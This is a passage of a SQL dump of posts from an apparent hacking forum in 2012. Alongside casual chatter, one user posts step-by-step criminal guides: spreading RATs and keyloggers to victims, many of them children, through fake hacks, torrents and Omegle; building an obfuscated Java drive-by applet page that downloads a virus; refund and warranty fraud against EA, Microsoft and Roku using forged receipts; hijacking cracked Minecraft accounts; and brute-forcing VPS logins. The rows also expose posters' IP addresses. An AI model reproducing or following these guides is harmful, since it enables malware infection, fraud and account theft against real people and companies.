`disableeditedby`, `edittime2`) VALUES ('3613', '684', '3498', '19', 'RE: Webtools - CF Resolver / Email Spoofer / Ping / Skype Tools & more', '0', '199', 'Anonymous™', '1349529644', 'Thanks for sharing this with us i needed this.', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'c3410b44107e5960dfe72e5779ec869a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3614', '488', '2355', '8', 'RE: What are you listening to?', '0', '82', 'iTzIpod', '1349533862', 'Listening to my keyboard making those \"typing noises\"', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '37700ec8437d219b9cf8f318dea032a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3615', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349533900', 'http://www.youtube.com/watch?v=t3yyJkIUErY', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c157dd1c6f91e951ae071b00bb2d8b98', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3616', '704', '0', '66', 'Minecraft Accounts', '0', '82', 'iTzIpod', '1349533993', 'I have a couple and I will give them out to members. Post & PM Me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '057b4475f296a1de9f82f642d462a346', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3617', '705', '0', '61', 'Minecraft Accounts', '0', '82', 'iTzIpod', '1349534141', 'Hey guys. I\'m giving away Free Minecraft Accounts. Just post here and PM me. Like what I\'m doing? You can support me by donating money to my Paypal. Please use the Gift method. And send it to this email SoaR_iPod@aol.com', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9885e99b36746a59d82dbb8892bb3949', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3618', '190', '665', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1349537447', 'http://www.picsend.net/images/533426humpse.gif', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '72ca16d6fbcfeac05a414857ad82256a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3619', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '222', 'Exposé', '1349537852', 'Haha idk just found it and was like dam, that\'s one fearless guy hahaha', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '185bf6a2bcf46cb181e5007cb6581653', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3620', '700', '3572', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '222', 'Exposé', '1349537887', 'Water is good after I play soccer or basketball, other than that it\'s Snapple :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '04f373ef2895ea848839b18e876cf9fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3621', '698', '3557', '7', 'RE: Skype group anyone?', '0', '222', 'Exposé', '1349537947', 'Ok added you dude. Hopefully we can get a couple more people :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '6d2b5f05fcdd3e89600e0a0afda8cb34', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3622', '629', '3047', '21', 'RE: [FREE] Giving Away DrDos Script [FREE]', '0', '160', 'Jacob', '1349538006', 'Can I please get it? Thanks :)', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '901f131db74afea58e52e6b8031472e1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3623', '680', '3457', '35', 'RE: Some of my works...', '0', '222', 'Exposé', '1349538017', 'Yeh it\'s probably due to the hosting....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'c308f0a8fcd3b679c991bf3490686f6d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3624', '488', '2355', '8', 'RE: What are you listening to?', '0', '222', 'Exposé', '1349538068', 'I mostly listen to Pandora when I\'m bored or something like that :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '64334b02cafc3c21bf026cca676ae5e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3625', '43', '105', '7', 'RE: How did you find us?', '0', '222', 'Exposé', '1349538179', 'Because I posted something and you closed one of my threads. Naturally that would not be right lol. So I checked ur profile and u have the mod userbar :P....gotcha :P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b4963ea4cf44e6484e312dfe1f121682', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3626', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '222', 'Exposé', '1349538450', 'Idk I think it\'s supposed to be some warrior guy or something. And it was rounded so it would be great for the left side :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '6911b19b01ad26400c41de3c7b18d8bf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3627', '197', '696', '56', 'RE: /me Thread', '0', '222', 'Exposé', '1349538588', '/me is a boss at social engineering!!!!', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a546bb3b7a84c17589ee3298c9d3d075', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3628', '238', '1021', '56', 'RE: Ban the user above you', '0', '222', 'Exposé', '1349538638', 'Banned because you used banned and pissed in the same sentence.', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'c58ab78c62444995944ed8eb42232402', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3629', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '222', 'Exposé', '1349538676', 'Awww yea mutha truckaaaaasssss', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'afca1cc17723640cdb9d3b8501e6eff7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3630', '691', '3517', '3', 'RE: Gaming Section Released', '0', '222', 'Exposé', '1349538782', 'Who play\'s MW3 anymore....pfffft. Battlefield 3 is the way to go :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'd04e1164b16fbc5007646240361d0a0f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3633', '706', '0', '4', 'Supppp', '0', '214', 'Rave™', '1349541493', 'Yo my name is Kasual. I\'m 14. I Specialize in RATTing and spreading, and SE\'ing. I\'m also decent at SE\'ing I\'ve SE\'d: 5 Otterbox\'s PS Vita Beats by Dre Monster 24 Pack Dr Pepper 24 pack Gogo Inflight Wifi American Eagle ME Electronics Gamcom 780 Headset iPhone 4S Griffin Case for my iPhone 4S Battery Case for my iPhone Porn Accounts and lots more.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'c0ec84f7be94949c32bb51c34b341a23', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3634', '707', '0', '13', 'How to migrate CRACKED minecraft accounts!', '0', '214', 'Rave™', '1349541573', '[align=center][size=large] [color=#FF6347] Not Sure If This Is In The Right Section![/color][/size] 1)Make sure your account is migratable.(login on minecraft.net with the username of the account you want to migrate) 2)Login into the migratable account and go to Profile. Click on the link they provided to migrate your cracked account. 3)Once at the page, login with your cracked minecraft username and password. They will ask you whether to create a new account with the provided email or a new one. Use the provided email. 4)Continue with the registration until the security questions. Remember the answers to these questions as you will need these later. 5)Go to My Account(top right)>Settings. Click \'Edit\' beside the email. Notice the \"If you no longer have access to the e-mail address tied to your you can request to change it by passing a security challenge. \" Click the hyperlink \'request to change it\' 6)Insert your email address you want to migrate the account to and click \'Request Email Change\' Now check your email you gave to Mojang and click on that link. They will ask for the security question answers. You created them just now, so place your answers inside there and tada! Done. Remember to change the password and everything, since you have total control of the account Also say thanks! [/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'c3c001e767f4d4dbbe8ab99b561d53a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3635', '708', '0', '16', 'EA Games', '0', '214', 'Rave™', '1349541618', 'Free EA Game Pass eBook By: Kasual 1. Download Amazon Receipt Creator 2. Generate an Identity 3. Open Amazon Receipt Creator 4. Fill In The Following a. Order Placed At least 5 Days Ago b. Item Name <Game Name> c. Item Price <Game Price> d. Address Information Your Fake Identity 5. Click “Generate” 6. Open the generated HTML file 7. Take a screenshot like THIS 8. Create an EA account 9. Visit EA Support a. Product <Game Name> b. Category Technical Support c. Platform <Your Platform> Example Chat [spoiler] EA: Thanks for choosing EA, how can I help you? You: I bought <Game Name> from amazon and the code was invalid. I called Amazon and now they\'re telling me to contact EA, so I am here. EA: Alright. EA: I regret for the inconvenience you experienced. EA: You need not worry, I\'ll do my best to address your issue. EA: Can I have your first & last name, and code of the game please ? You: <First & Last>, and give me a second to get the code You: <Few Seconds Later> <Enter Code Here> You: Also, I can give you the receipt from amazon if necessary You: (It\'s for Xbox 360) EA: Ralph, thanks for providing me the requested information. EA: Yes, great! EA: Please upload the image of receipt at this link:- http://www.kn3.net EA: That\'s the one from email. EA: Is this a receipt ? EA: Yes, from amazon. EA: A hard copy or soft copy ? EA: It\'s a soft copy, it\'s from email. I only use these for filing with amazon. Do you require something else? EA: Okay. EA: Please provide me your gamer tag. You: <Gamertag> EA: Let me go ahead and pull-out a new code. Here we go- EA: Here is the new code:- <code> You: I\'ll redeem on Xbox.com real fast, hopefully this one works You: Yes! It works, finally! You were very helpful, if there is a survey after this you\'ll get 5 stars! [/spoiler]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '1192dd2829d0238b986139dc058b5b7b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3636', '709', '0', '16', 'SE Microsoft', '0', '214', 'Rave™', '1349541657', '[align=center] everyone, this is an easy little tutorial for your first (or if you\'re bored) free item. It\'s hassle free, you don\'t need a receipt 1. Open up skype and call this number - 8009365700 2. Say Tech support 3. Say \"____\" - Insert whatever product you want to SE here. 4. Someone will ask you for your name + number. Tell them your real name (If you want) but make up the number (I always do, they don\'t care) 5. They will ask about the product. Tell them that it was a gift from a friend, but it does not work. For me, I wanted a Microsoft Lifecam Cinema HD. I told them that the device did not show up after plugging it in in numerous computers. They may or may not ask some other troubleshooting questions. If they do, just work around it to make sure that they know it does not work. 6. S/he will give you a caseID number. Keep a hold of it as she will put you through to another directory. 7. Tell the new person your name + CaseID number. 8. They may ask about the product not working. See step 5. 9. Now they should say that they will replace it. Give them your email address if you haven\'t already and wait for an email from them. 10. Reply to the email. It should be your information that they need. Make sure it is REAL. Enjoy your free microsoft product. Try not to do this too many times in one sitting as people have been known to get caught. Note: In the case they DO ask you to give them a picture of a receipt or the product. You can either A. Hang up and try again later on. Or B. Forge up a quick receipt. For more info about this, look in the VIP section for information about receipts. Plan A is usually best though.. Hope you found this guide informative. It\'s fairly common to some but I wrote it up for the guppies such as myself. Have fun SE\'ing! [/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'bc261935c825164bc1980ef47cca251b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3637', '710', '0', '12', 'Ultimate Spreading Guide', '0', '214', 'Rave™', '1349541907', '[align=center] [color=#FF6347] I saw a lot of people asking for help with spreading their Keylogger or their RAT. Now i decided to make a huge tutorial on spreading to help the community. I will start with very basic and famous stuff like youtube and also a few advanced methods. NOTE: before doing all of this,you must make sure that your server is already FUD. General Things you need: a RAT (ready set-up, make sure its working) a crypter (you will get a lot more victims if your server is FUD) a filehost (for example fileave or dropbox) a computer a brain would not be bad Methods: [spoiler] 1). Youtube In my opinion the most famous and easiest method. It is great if you want to target a special group like people with special accounts, for example steam. 1. Go to youtube.com and register a account if not allready done. 2. In my example i will target people with steam accounts, so i look for some videos with the title \"Steam Hack\" or \"Black Ops Hack/Keygen\" or something like that. You also can look for a pay palhack video, you will find something you like. 3. When you found a good video, go to keephd.com and download the video in your preferred quality. 4. Then go back to youtube and upload the downloaded video. 5. While uploading, think about an attractiv title for the video, for example \"Black Ops Keygen 100% Working !!!\". In the description put a small text, for example a readme and your server.exe download link. 6. When its uploaded your done. Tips: -At the beginning your views and downloads will only increase slowly but they raise fast and you get a good amount of downloads. - It can help to use a youtube bot to increase views, thumps up etc. to make your video more legit looking, or ask a few friends you haveBiggrin [/spoiler] [spoiler] 2). Forums First of all i don\'t mean SPAM! I dont want anybody posting malware here! In my opinion its another simple method. There are a lot of big and active forum to post some malware. The best choice are forums with a lot of young members because they download everything they can get and that sounds cool and interesting (i am talking from my own experienceBiggrin). 1. Look for a big forum on google. It will come up a lot of them, i would take one from the first google page. Easiest Forums to spread are gaming/cheating forums because most of them are kids or teenager. 2. Create a new account there with a cool username ( it should look trusting, not \"l33t-haxxor\" or \"i hack you\" ). 3. Design your profile with avatar, signature, some fake details like you want. 4. Make some HQ threads to catch the members attention and make you looking more trusted. 5. After a time make a new thread about a new simple UD wallhack or a working keygen you coded in the last time. Make the thread attractiv and detailed to catch the readers eye. You should add a detailed feature list, screenshots and maybe a short video. 6.You are done. Wait for the first kids downloading your file. Tips: - Make multiple accounts to answer to your thread and vouch for you. These account should also look legit to the others, so not 1 time posters or joined 1 minute before. [/spoiler] [spoiler] 3). Torrents Another Easy method that will get some easy Bots for you. 1. Download a torrent program like BitTorrent here: \"Guests cannot see links in the messages. Please register to forum by clicking HERE to the see links.\" 2. Install BitTorrent if not allready done 3. Go to file -> Create new Torrent 4. Look for your file and select it. Now a new torrent with your file will be created. 5. Go to a famous torrent site like Piratebay.org 6. Upload your new torrent to the site with a detailed description. As title choose something like a pay pal hack or a BF3 Beta keygen, something that will attract many people. [/spoiler] [spoiler] 4). Omegle This is more complicated because you dont get that many downloads, you have to work for each one. There are diffrent omegle methods, you only can post your server link to each of them and say its a photo package, but thats not working good. I give you a better method. I think many will know it: 1. Download the program ManyCam which allows you to use a virtual webcam. 2. Install Manycam 3. Download this video pack of a girl. It can wave and do some other things. Download: \"Guests cannot see links in the messages. Please register to forum by clicking HERE to the see links.\" (this is not my video package, but i used it a few times. Thanks to whoever posted thisBiggrin) 4. Start omegle, ss soon as you get into a conversation with somebody go to your many cam and start the \'Wave\' clip.. So it waves at the person and looks very legit. 5. Start a conversationen about some normal things with him/her. 6. After that ask if he/she wants to see some pictures. 7. Sent him your server.exe or your JavaDriveBy and your done if he opened it. Tips: - If you fail, you can retry as often as you want - You should replace the server.exe icon with a jpg icon and may hide the file ending to make it more legit. [/spoiler] [spoiler] 5). JavaDriveBy JavaDriveBys are great. You put them on a site and everyone who visits this site download a hidden file and executes it. If your server is FUD, Most people will not notice something is wrong. I will present you a very simple java drive by, you can search the forums to find more advanced ones. 1. Go to dot.tk 2. In the URL field enter your direct server link. 3. After loading the url, you can change the name of the url to something good looking, for example \"pay pal-hack.tk\" or \"naughty-nude-girls.tk\". 4. After getting this link you can spread it everywhere you want. Tips: -You can spread this with the help of other methods in this tutorial. Say you made a cool new website with a lot of hacking tools and software or you want to show your new website and the people will click on it because they are interested on your site. [/spoiler] [spoiler] 6). PTC Sites PTC sites are sites that pay you for visiting links or sites for a short time. For this method we will use a JavaDriveBy that we will advertise on a PTC site for a low amount of money. You will get 2000 views on your link for only $1 1. First of all make your JavaDriveBy ready to work. 2. Then look for a big PTC company. Many of them are scam, but there are a few ones that are ok. I take the site paidtoclick.in 3. Make a new account there and make it ready to work. 4. Click on the advertise button 5. Click on the \"Buy Now\" Button besides the \"Link ad Hits\". Try with $1 6. Create a new link with a title you want, for example money making software or something like that. 7. Put your JavaDriveBy into the target URl field. Leave the rest blank. 8. Then pay for it and wait for the victims Biggrin Tips: -The more money you invest the more victims you get. -Try to do it on diffrent PTC sites that are activ. [/spoiler] [spoiler] 7). Auto Spreader Auto Spreaders or worms are a helpful thing in spreading. You put your file on a little server and it spreads itself from every slave to other people. Many worms use facebook, msn, 4chan and other communities or chat programs to spread itself. You can spread your worm with the help of the methods above and you will multiple your victims and spreading work. [/spoiler] Thanks for reading my Guide, please post a little feedback or give me some feedback on what to edit or make it better. Don\'t forget to say thanks! Enjoy! [/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '63538cc19e3b8d4fa4f685e99a8e15c2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3638', '711', '0', '16', '[EASY] SE Books', '0', '214', 'Rave™', '1349541964', '[align=center] [color=#1E90FF] How to get free books: 1. Go on Amazon.com and find a book you want. Take note of the publisher and the ISBN number. 2. Find the publisher\'s contact us info and send them an email. Include a simple excuse like the last few pages had ink smeared or a few pages were missing (I suually use the ink smearing). 3. They usually ask for your address to send the replacement to and for you to discard of the original in an environmentally friendly manner. That\'s really all there is to it. There are lots of publishers out there, so use that to your advantage. I\'ve got many books this way, including expensive textbooks I\'ve needed for school (although they often take a while to ship, so do it well in advance).[/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'a78f52576338c69ed4cb56e13762b70f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3639', '712', '0', '13', 'SQL Injection Ebook', '0', '214', 'Rave™', '1349542033', '[b] Hey guys. I have for you a SQL Inject eBook [/b] [color=#32CD32] [size=xx-large]Download: [url=http://www.mediafire.com/view/?4m8shdqdjb8whsr]I LOVE YOU KASUAL THANKS FOR BEING SO ACTIVE AND NO POST AND PM <33[/url] [/size][/color]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '27ed3ff9118c1633283ce74f4d22f3f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3640', '713', '0', '12', 'How To Make A FUD Java Drive-By', '0', '214', 'Rave™', '1349542067', '[size=xx-large][align=center][color=#32CD32] How To Make A FUD Java Drive-By By Kasual[/color][/align][/size][b]Step 1[/b] Download these files: [url=http://uppit.com/dko09gqkar8x/fudjava.rar]http://uppit.com/dko09gqkar8x/fudjava.rar[/url] Virus Scan: https://www.virustotal.com/file-scan/rep...1323713087 [b]Step 2[/b] go to http://www.000webhost.com and register an account, unless you have a paid domain/webhost or have a different free hosted one. [b]Step 3[/b] Extract the files you had downloaded earlier in Step 1 to a folder somewhere on your computer that you\'ve the knowledge to navigate yourself to. [img]http://i283.photobucket.com/albums/kk291/Demiflame2/fud.png[/img] Go into the folder you\'ve just extracted the files to, and right-click the game.html file and edit with notepad, notepad++ or whatever you have and prefer to edit documents with as seen below. [img]http://i283.photobucket.com/albums/kk291/Demiflame2/fue-1.png[/img] You should see the following <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2//EN\"> <html> <head> <title>YourSiteOrServerNameHere - Webclient</title> </head> <body bgcolor=\"grey\"> <center> <APPLET CODE = \"Client.class\" ARCHIVE = \"Client.jar\" WIDTH = \"0\" HEIGHT = \"0\"> <PARAM NAME = \"AMLMAFOIEA\" VALUE = \"YourVirusUrlGoesHere\"> </APPLET> </center> </body> </html> The above code is basically self-explanatory. Replace what is inbetween the \'title\' tags with your webpage\'s name. Replace the YourVirusUrlGoesHere with your virus Url. [b]Step 4[/b] Create a new directory as to where you would like the page that has the drive-by in it to be located at. For example, if you\'d like it to be located at http://www.yoursitenamehere.com/game.html Then all you need to do is go into your public_html directory and place the files in there, not in a sub-directory. So just select the jar file and the html file and drag & drop them into your public_html directory like shown below. [img]http://i283.photobucket.com/albums/kk291/Demiflame2/fuf-2.png[/img] [img]http://i283.photobucket.com/albums/kk291/Demiflame2/fug-1.png[/img] If you accept the Java Applet by clicking \'Run\' then your virus will auto download. I suggest using a crypter, because if not then it\'s not the hardest thing to detect for those out there with some common sense, although the past few days of RATting I see that many out there have none. I strongly suggest encrypting your html, if not then people can right-click your page and view the source, and see that it\'s downloading an .exe file to their computer. To encrypt your Html, just go here http://www.iwebtool.com/html_encrypter copy and paste the html within your .html document(game.html unless you\'re using your own .html document) in the box and then click the \'Encrypt!\' button. The outcome will look be in a JavaScript code, but you can just paste it into your html document without the <html> and <body> tags etc. for the page, as the encrypted copy already has it embedded within it. I\'m going to give a bit of advice, although encrypting your Html helps better hide the visibility of the virus to the people you\'re trying to infect, I strongly recommend copying the encrypted Html and pasting it in the box, clicking the \'Encrypt!\' button and repeating the process anywhere from 3-20 times to make it harder for people to decrypt. I suggest that you either remove the <!-- HTML Encryption provided by iWEBTOOL.com --> or at least edit it to say something like <!-- HTML Encryption by YourSiteNameHere due to copyright issues --> or something else that you feel people will believe quite easily incase they try to view your page\'s source to check if it\'s safe before accepting the drive-by. That, is how you embed and infect people using a FUD Java Drive-by. Hope this helped many of you all. I made this tutorial over the day on the side because I noticed a fair bit of people were wondering how to do this and not get a virus from downloading the proper files required for this. Thanks enjoy!', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'fcd97e33a783c46add032c30827dcb31', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3641', '714', '0', '3', 'Spam Bot Bug', '0', '214', 'Rave™', '1349542427', '[b] Hey Joker man, I was trying to post my thread, and it kept saying the work \"card\" was spam. I used the control f and searched for c a r d, no c a r d in my thread. Lol so I ended up not posting it :P [/b]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'e829d22904a2ddd64749cc4b53258706', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3642', '715', '0', '23', 'Free HostGator Hosting! [N00B Friendly]', '0', '214', 'Rave™', '1349542488', '[b] [color=#FF4500] Alright. Go to Hostgator. [/color][color=#32CD32] Next create a account[/color][color=#FFD700] Now, enter coupon code [size=xx-large] Coupon Code : FREEHOSTGATOR123 GET IT FREE! [/size][/color][/b]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '7dd6c0858439fa01d06c652ebed21bed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3643', '716', '0', '16', 'Roku 2 XD', '0', '214', 'Rave™', '1349542540', '[align=center] [color=#32CD32] Requirements: - Roku 2 XD Serial - A brain Step 1: Go to Roku\'s support page and live chat. Enter in all your real information. Link: http://support.roku.com/home# Step 2: Say that your Roku is not showing up on the TV, and that you have tried to reset the device, HDMI and RCA, and a new power adapter from a friend and none of those worked. They will ask when you bought the Roku, say a date past a month ago. For example, if today is the 12th of June, say May 20th. If they say to contact Amazon, say you already did and they said to contact Roku since the date is past a month. They will also ask for the serial and the model #. If it\'s a Roku 2 XD, the model# is: 3050R. Step 3: They will ship out another Roku. Keep the Roku 2 XD and enjoy. Btw, they won\'t even bother asking for it back really. Their replacement team is lazy as fuck. [/color][/align]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '12741f1b0620e4e3628d8ded814ec0a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3644', '717', '0', '12', 'How to Bruteforce VPS!', '0', '214', 'Rave™', '1349542596', '[align=center][color=#32CD32][size=large] How to BruteForce a VPS! [/align] [/size][/color] [size=medium] Hey guys, This is my first tutorial so.. Hope you guys like it. :D [color=#FF4500] [size=xx-large] 1) [/size] [/color]Alright first off your going to need to download DU Brute, And VNC Scanner. Link: [/size] [url=http://www.mediafire.com/?5kfe8qg0s7qazsl]CLICK ME![/url] [size=medium] [color=#FF4500] [size=xx-large] 2) [/size] [/color] After you have those downloaded your going to have to go into the VNC Scanner folder and open \"vnc_scanner_gui.exe\" Its the one all the way at the bottom. Once you have that opened it should look like this [img]http://i.imgur.com/DmjVP.png[/img] [color=#FF4500] [size=xx-large] 3) [/size] [/color]Now your going to need to go to get some proxies. After you have some, just copy the proxies and paste them in the VNC Scanner. Then press \"Start Scan\" 